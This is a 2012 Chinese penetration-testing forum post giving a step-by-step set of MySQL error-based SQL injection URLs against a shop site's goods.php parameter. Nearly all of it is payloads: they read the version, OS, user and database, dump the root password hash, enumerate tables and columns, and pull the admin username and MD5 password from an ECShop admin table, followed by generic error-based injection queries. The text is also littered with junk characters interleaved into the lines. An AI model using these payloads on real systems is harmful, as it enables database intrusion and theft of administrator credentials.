找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 盲注详细内容
返回列表 发新帖
查看: 2386|回复: 0
打印 上一主题 下一主题

盲注详细内容

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-5 14:59:30 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
判断版本号
8 ~# r: v) X# qhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23: Y% W$ W7 Q# z- m) E- s# N* A* H! n

; ^. w2 |& o  s# w判断系统, ]9 A. W6 a, N: H6 ?' P0 {

" f. G$ i2 Q2 h4 V- A; ]: d4 j1 i) nhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23  U7 N$ s$ l) K
, Q7 ?) Z5 i2 R0 ]; H- k

8 N" _0 [& x& h1 {! y2 U/ ]1 `, x3 i6 y) W3 _2 @( R% y  t+ a
当前 user()$ X- Q+ m4 J" `
3 b! H/ W: N( i9 b: K2 v
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
% B  [- w8 S( ?8 |9 k3 |
) K* @2 N% d# U$ b. M& u; @/ T/ C1 `1 ?/ D  e

- y/ K7 |( b2 y  l5 C当前 database()
; m5 [& e4 J! W# X( {8 Uhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
7 a" n" D) Q2 h% B, V' J- y, [1 b5 H1 C/ i% R. o& [

9 y+ ?' ?3 {  K- |, r6 o0 [& M. J. g2 B% B6 [/ ^
# a1 q! u6 B( Z& Y9 r; J
root hash
' I, A1 |- P, R# g% K' a) i# N* \( N- O; {2 ?6 C
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
; }7 J# K) D1 l3 y' {
4 M" @5 \8 g* a& w
. i6 ]& O3 ^" P; g5 A! ^8 H3 [( s' U! @$ W- b% n8 t* T
当前 数据库表名8 ~, w% H) d2 H+ B& k5 l/ |: B; S
) j+ y6 Q) H( i* n! b
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
* _* B0 l$ j$ K* }) e' l: [( `" @7 A- u. e: ^
+ I: u- C) p) q; _9 T

& b8 q, z( x" |& H# o$ [3 z. \当前 数据库 user_name 字段
$ }7 G3 F5 t& ?0 \' S
. h3 e/ ~: r. v& H( |" ?  o0 Qhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
( t. l5 y( e2 m
2 B8 n+ b$ Z. B/ u- L当前 数据库 字段 password
% V6 }6 B' p: j1 b( H' S0 Whttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
# P- C8 ?( [6 G7 }7 L5 r# [  W8 t9 O$ u5 f' ~2 [$ b

" p+ J( P' o" v# ]
5 ?& M- M/ @4 j1 ?获得 admin passwd(md5)1 c$ ^3 w/ c! Q$ w2 n3 ~7 {6 L
! N1 H+ u& q/ b& z" D

# m% r. Q  ]( o6 o# l9 g) C. {5 shttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
2 ]# h' J: ^$ r. ~2 o* b- M+ D4 b  c
报错注射2 ^5 D! L; U8 ^) n; i- V+ h
SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)3 w* C8 q$ ]: [8 B5 d2 D& Y7 N

, \; n# v) k5 n, b$ {  y3 l2 \' |SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)
$ a6 x! e- f* B, H( G  }. h
8 J) y# |: [; F! e$ H4 xand(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表